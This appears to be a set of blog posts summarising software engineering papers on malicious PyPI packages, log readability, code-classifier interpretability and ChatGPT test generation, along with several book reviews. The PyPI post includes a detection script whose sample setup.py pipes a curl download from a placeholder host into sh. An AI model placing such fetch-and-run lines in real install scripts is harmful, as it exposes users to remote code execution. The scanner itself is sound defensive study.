I often use Python because of its large ecosystem of libraries. Thanks to these libraries, I do not have to focus on implementation details and can concentrate on the task at hand. However, not all libraries are good, which is why this paper caught my attention. The study aims to understand the characteristics and lifecycle of malicious code in PyPI by building an automated data collection framework and analyzing a dataset of malicious package files.
Key findings and contributions of the paper include:
Empirical Analysis: The authors conducted an empirical study to understand the characteristics and lifecycle of malicious code in the PyPI ecosystem.
Automated Data Collection: They built an automated data collection framework to gather a high-quality dataset of malicious code from PyPI mirrors and other sources.
Dataset Construction: The dataset includes 4,669 malicious package files, making it one of the largest publicly available datasets of PyPI malicious packages.
Classification Framework: An automated classification framework was developed to categorize the collected malicious code into different types based on their behavior characteristics.
Malicious Behavior: The research found that over 50% of the malicious code exhibits multiple malicious behaviors, with information stealing and command execution being particularly prevalent.
Novel Attack Vectors and Anti-Detection Techniques: The study observed several novel attack vectors and anti-detection techniques used by malicious code.
Impact on End-User Projects: It was revealed that 74.81% of all malicious packages successfully entered end-user projects through source code installation, increasing security risks.
Persistence in Mirror Servers: Many reported malicious packages persist in PyPI mirror servers globally, with over 72% remaining for an extended period after being discovered.
Lifecycle Portrait: The paper sketches a portrait of the malicious code lifecycle in the PyPI ecosystem, reflecting the characteristics of malicious code at different stages.
Suggested Mitigations: The authors present some suggested mitigations to improve the security of the Python open-source ecosystem.
The study is significant as it provides a systematic understanding of the propagation patterns, influencing factors, and potential hazards of malicious code in the PyPI ecosystem. It also offers a foundation for developing more efficient detection methods and improving the security practices within the software supply chain.
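To make the "command execution at install time" finding a bit more tangible, here is a minimal sketch of a static check over an install script. It is not the authors' classification framework; the watch list `SUSPICIOUS_CALLS`, the helper names and the example script are all my own assumptions, and a real detector would need far richer rules.

```python
import ast

# Hypothetical watch list, chosen only for illustration.
SUSPICIOUS_CALLS = {
    "eval",
    "exec",
    "os.system",
    "subprocess.run",
    "subprocess.call",
    "subprocess.Popen",
    "subprocess.check_output",
}


def dotted_name(node):
    """Return a dotted name such as 'os.system' for a call target, or None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_suspicious_calls(source):
    """List (line number, call name) pairs for calls on the watch list.

    The source is only parsed, never executed.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


# Made-up install script, used only to exercise the scanner.
EXAMPLE_SETUP = '''
import os
from setuptools import setup

os.system("curl http://example.invalid/payload | sh")
setup(name="demo", version="0.1")
'''

if __name__ == "__main__":
    for lineno, name in find_suspicious_calls(EXAMPLE_SETUP):
        print(f"line {lineno}: {name}")
```

A check like this is easy to evade (aliased imports, obfuscated strings), which fits the paper's observation that malicious code uses anti-detection techniques.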
Debugging and testing often require analyzing log files. This means reading many lines of information that may be useful but are hard to parse. Therefore, this paper is of interest to those who must read these files once in a while.
This paper investigates the readability of log messages in software logging. The authors conducted a comprehensive study involving interviews with industrial practitioners, manual investigation of log messages in open-source systems, online surveys, and the exploration of automatic classification of log message readability using machine learning.
Key findings and contributions of the paper include:
Practitioners’ Expectations (RQ1): Through interviews, the authors identified three aspects related to log message readability: Structure, Information, and Wording. They also derived specific practices to improve each aspect. Survey participants acknowledged the importance of these aspects, with Information being considered the most critical.
Readability in Open Source Systems (RQ2): A manual investigation of log messages from nine large-scale open-source systems revealed that 38.1% of log messages have inadequate readability, particularly in the aspect of Information.
Automatic Classification (RQ3): The study explored the use of deep learning and machine learning models to automatically classify the readability of log messages. The models achieved a balanced accuracy above 80% on average, indicating their effectiveness.
The paper’s contributions are significant as it is one of the first studies to investigate log message readability through interviews with industrial practitioners. It highlights the prevalence of inadequate readability in log messages within large-scale open-source systems and demonstrates the potential of machine learning models to classify log message readability automatically.
The study provides systematic comprehension of log message readability and offers empirically-derived guidelines to improve developers’ logging practices. It also opens avenues for future research to establish standards for composing log messages.
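The three aspects (Structure, Information, Wording) are easier to appreciate with a small example. The sketch below uses Python's standard `logging` module; the logger name, the `describe_failure` helper and the order data are hypothetical, and the "better" message reflects my reading of the aspects rather than the paper's specific guidelines.

```python
import logging

logger = logging.getLogger("payments")


def describe_failure(order_id, attempt, max_attempts, reason):
    """Build a message that says what failed, for which order, and why."""
    return (
        f"Payment failed for order {order_id} "
        f"(attempt {attempt} of {max_attempts}): {reason}"
    )


if __name__ == "__main__":
    # Structure: a consistent prefix with time, level and component.
    logging.basicConfig(
        format="%(asctime)s %(levelname)s %(name)s: %(message)s",
        level=logging.INFO,
    )
    # Harder to act on: no identifier, no cause, vague wording.
    logger.error("Error occurred!!")
    # Easier to act on: names the operation, the affected order and the cause.
    logger.error(describe_failure("A-1042", 2, 3, "card issuer timed out"))
```

The second message costs a few more characters, but whoever reads the log at 2 a.m. no longer has to guess which order failed or why.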
The authors conclude that their study sheds light on the importance of log message readability and provides a foundation for future work to improve logging practices in software development.
I’ve used language models for a while now. They are capable of many tasks, but one of their main problems is the robustness of the results. The models can produce very different results if we change only a minor detail.
This paper addresses the challenge of interpretability in deep learning models used for source code classification tasks such as functionality classification, authorship attribution, and vulnerability detection. The authors propose a novel method called Robin, which aims to create robust interpreters for deep learning-based code classifiers.
Key points from the paper include:
Problem with Current Interpretability: The authors note that existing methods for interpreting deep learning models are not robust and struggle with out-of-distribution examples. This is a significant issue because practitioners need to trust the model’s predictions, especially in high-security scenarios.
Robin’s Approach: Robin introduces a hybrid structure that combines an interpreter with two approximators. This structure leverages adversarial training and data augmentation to improve the robustness and fidelity of interpretations.
Experimental Results: The paper reports that Robin achieves on average a 6.11% higher fidelity when evaluated on the classifier, 67.22% higher fidelity when evaluated on the approximator, and 15.87 times higher robustness compared to existing interpreters. Additionally, Robin is less affected by out-of-distribution examples.
Contributions: The paper’s contributions are threefold: addressing the out-of-distribution problem, improving interpretation robustness, and empirically evaluating Robin’s effectiveness compared to known post-hoc methods.
Motivating Instance: The authors provide a specific instance of code classification to illustrate the problem inherent to the local interpretation approach, demonstrating the need for a robust interpreter like Robin.
Design of Robin: The paper details the design of Robin, which includes generating perturbed examples, leveraging adversarial training, and using mixup to augment the training set.
Source Code Availability: The source code for Robin has been made publicly available, which can facilitate further research and application by other practitioners.
Paper Organization: The paper is structured to present a motivating instance, describe the design of Robin, present experiments and results, discuss limitations, review related work, and conclude the study.
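The mixup step mentioned in the design of Robin is a general data augmentation idea: blend two training examples and their labels with a random weight. The sketch below shows only that generic idea on plain numeric vectors. How Robin applies it to source code is not covered in this summary, so the vectors, the `alpha` value and the function name are my assumptions.

```python
import random


def mixup(x_a, y_a, x_b, y_b, alpha=0.2, rng=random):
    """Blend two examples and their one-hot labels with a Beta-sampled weight."""
    lam = rng.betavariate(alpha, alpha)  # mixing weight in [0, 1]
    x = [lam * a + (1.0 - lam) * b for a, b in zip(x_a, x_b)]
    y = [lam * a + (1.0 - lam) * b for a, b in zip(y_a, y_b)]
    return x, y, lam


if __name__ == "__main__":
    # Two toy feature vectors with one-hot labels for two classes.
    x, y, lam = mixup([1.0, 0.0], [1.0, 0.0], [0.0, 1.0], [0.0, 1.0])
    print(f"lambda={lam:.3f} features={x} soft label={y}")
```

The blended label is "soft": it still sums to one, but spreads the mass over both classes in the same proportion as the features.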
The authors conclude that Robin is a significant step forward in producing interpretable and robust deep learning models for code classification, which is crucial for their adoption in real-world applications, particularly those requiring high security.
Generating test cases is one of the new areas where ChatGPT is gaining traction. It is a good thing, as it allows software developers to quickly raise the quality of their software.
This paper discusses the problem and challenges in finding failure-inducing test cases, the potential of using LLMs for software engineering tasks, and the limitations of ChatGPT in this context. It also provides insights into how the task of finding a failure-inducing test case can be facilitated if the program’s intention is known, and how ChatGPT’s weakness at recognizing nuances can be leveraged to infer a program’s intention.
The authors propose Differential Prompting as a new paradigm for finding failure-inducing test cases, which involves program intention inference, program generation, and differential testing. The evaluation of this technique on QuixBugs and Codeforces demonstrates its effectiveness, notably outperforming state-of-the-art baselines.
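The differential testing part of this idea can be sketched in a few lines. In the paper the reference versions come from the program generation step; here they are hand-written stand-ins, and the buggy program, the function names and the candidate inputs are all made up for illustration.

```python
def buggy_max(values):
    """Program under test: wrong when every value is negative."""
    best = 0  # seeded bug: should start from the first element
    for v in values:
        if v > best:
            best = v
    return best


def reference_a(values):
    """Stand-in for one generated reference version."""
    return max(values)


def reference_b(values):
    """Stand-in for a second, independently written reference version."""
    return sorted(values)[-1]


def failure_inducing_inputs(program, references, candidates):
    """Return inputs where the references agree but the program differs."""
    failures = []
    for case in candidates:
        outputs = [ref(case) for ref in references]
        references_agree = all(out == outputs[0] for out in outputs)
        if references_agree and program(case) != outputs[0]:
            failures.append(case)
    return failures


if __name__ == "__main__":
    candidates = [[1, 2, 3], [5], [-4, -2, -9], [0, -1]]
    print(failure_inducing_inputs(buggy_max, [reference_a, reference_b], candidates))
```

Requiring the references to agree with each other before trusting them is a cautious design choice: if they disagree, the sketch simply says nothing about that input.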
The contributions of the paper include the original study of ChatGPT’s effectiveness in finding failure-inducing test cases, the proposal of the Differential Prompting technique, and the evaluation of this technique on standard benchmarks.
The paper also acknowledges that Differential Prompting works best for simple programs and discusses its potential benefits in software engineering education. Preliminaries and methodology are provided to illustrate the task of finding failure-inducing test cases and the workflow of Differential Prompting.
The authors conclude with the promising application scenarios of Differential Prompting, suggesting that while it is currently best for simple programs, it is a step towards finding failure-inducing test cases for larger software. They also highlight its benefits for software engineering education.
Today I had the chance to read a book a bit outside of what I do nowadays. I used to read a lot of leadership books when I gave my old course on start-ups. Well, enough of the history. So, I’ve read the book, and it was really nice.
It is a book about the modern leadership style at Netflix. It’s written from the perspective of Netflix’s manager (Reed Hastings), with commentary by a business school professor, Erin Meyer (https://erinmeyer.com). It’s a very interesting read, as it provides an account of how leadership at Netflix has evolved over time into what it is today.
Empowerment and a flat leadership structure are at the core of this style, but they evolved continuously over the years. Candor was the first new leadership practice to be introduced, and it’s something that all organizations could use. Even universities.
A lot of software engineering research studies use open source data and mine software repositories. It’s a common practice since it allows us to test our hypotheses before asking for precious resources from our collaborating companies. By mining open source data we can also learn whether our study makes sense; we can see it as a pilot study of sorts.
Mining software repositories has evolved into a popular activity since we got access to repositories like GitHub. There are even guidelines for assessing this kind of study, e.g., https://sigsoft.org/EmpiricalStandards/docs/, and there are regulations on what we can do with open source data. These can take the form of a license, a law (like GDPR or the CCPA) or the need to ask an ethics board for approval. However, there is also common sense: not everything that is legal is appropriate or ethical. We always need to ensure that no individual is subjected to harm as a result of our actions.
In the article that I want to bring up today, the authors discuss ethical frameworks for software engineering studies based on open source repositories. The principles we need to follow are:
Respect for persons, which stresses the need for approval and consent.
Beneficence, which means that we need to minimize the harm, but maximize the benefit.
Justice, which means that we need to consider each individual equally.
Respect for law and public interest, which entails conducting due diligence on which data we can use and in which way.
The most interesting part of this article is the analysis of different cases of mining software repositories. One example is the case of analyzing code, reviews, commit messages and other types of data in the repositories.
I recommend this article to everyone who is considering mining software repositories.
GPT technology, exemplified by GitHub Copilot and the like, changes software engineering from the ground up. There is no doubt that the technology places a new tool in our engineering shed. It allows us to create software with a completely different set-up than what we are used to.
Now, it really changes only a few things, but these are very big ones.
Programmers -> designers and architects. GPT can write source code like no other tool on the market. And it only gets better at this. A quick glimpse at the GitHub Next website gives us a good understanding that this team has only just got started. This changes everything we know about engineering software. Bad programmers will disappear over time. Good software designers, architects and software engineers will take their place. They will be fewer in number, but better in quality.
Software development -> software engineering. Designers will no longer get stuck solving a small bit of a puzzle. GPT will do it for them. Instead of thinking about how to write a test case, the designers will think about how to test the software in the best possible way. They will focus on the engineering part of software engineering, something that I have been teaching my students from day one.
Consultancy -> knowledge hubs. Since programming will become easier and more approachable, we will need people who know how to solve a problem, not how to write a program. This big chunk of the consultancy companies’ business will disappear. The consultancy companies will specialize in their domains and in problem-solving.
There will also be other things that will happen. Requirements will not be the same as they are. Testing will be different, architecting will be smarter and management more optimal. Knowledge will be more valued and critical thinking will be needed even more.
Well, this is my end of the academic year blog post. More to come after the summer. Stay safe!
I’ve read this book recently, as the title and the authors caught my attention. Can you really write notes from the apocalypse? Well, it turns out that the authors of this book gave it a very interesting twist.
This book is about people who prepare for the apocalypse. It takes us to a number of places where we meet people who prepare for the worst. For me, the most interesting was a guy who bought an old army bunker and prepared a reasonably priced ranch for surviving after a nuclear war. Well, reasonably is still 35,000 dollars, but given that you get to live through the worst, maybe it’s not that expensive.
However, it was not the price that caught my eye. It was how he marketed that shelter. The shelter itself was quite spartan, as opposed to the shelters for the ultra-rich, with pools, game rooms, cinemas and what have you.
The main selling point for the shelter was not the spartan conditions; it was the dream and the possibility of survival. The owner was selling people on the idea that they will be the ones to create the brave new world after the old one collapses.
I’m not certain that there would be a world after a nuclear apocalypse (the Chernobyl disaster happened 30 years ago and the area will be uninhabitable for the next 200 years), but I did like the way he sold the “condos” in the shelter. Quite brilliant, actually.
AI is here to stay. We know that. It will only grow in its influence. We know that too. Especially after the release of ChatGPT we know that.
This book looks into different scenarios of co-existence between humans and AI. This is a novel view on the topic, which differentiates this book from others of its kind. Previous views were either doomsday theories about how AI takes over the world, or the belief that AI will never really take off because it lacks consciousness and a human soul.
This book starts by looking at the historical development of humanity when a new technology was invented. First we have some limitations, which stop us from mass-using this technology. Then, we improve it and start using it a lot, which creates jobs and new markets. Then we automate it so that it can scale fast, which causes mass loss of jobs related to it.
Imagine banking – first, it was manual, which was cumbersome and error prone. Then came calculating machines, which required an army of operators who inputted simple instructions and got results. Then computers came and finally the Internet. Banks are still there, as institutions, but the job of a banker is not the same as 100 years ago. Well, it’s not really the same as 20 years ago; somewhat similar to 10 years ago, but not really.
The same goes for AI, and therefore we need to learn how to co-exist with it. We can control it, or we can adjust to it, or we can co-develop it and take advantage of it.
I strongly recommend this book as a read on how to tackle the developments in AI realistically, not in the style of a doomsday prophecy.
Interestingly, this is a paper from colleagues of ours from the department. The paper presents how one company – Ericsson – works with continuous deployment of their large software system in 3G RAN (Radio Access Networks). The highlights from the article are as follows:
New software field testing and validation activities become continuous.
Software deployment should be orchestrated between the constituent systems.
A pilot customer to partner with is key for success.
Companywide awareness and top management support are important.
Documentation and active monitoring are critical for continuous deployment.
I like this paper because it presents a practical approach and a good set of practices that can be taken up by other companies.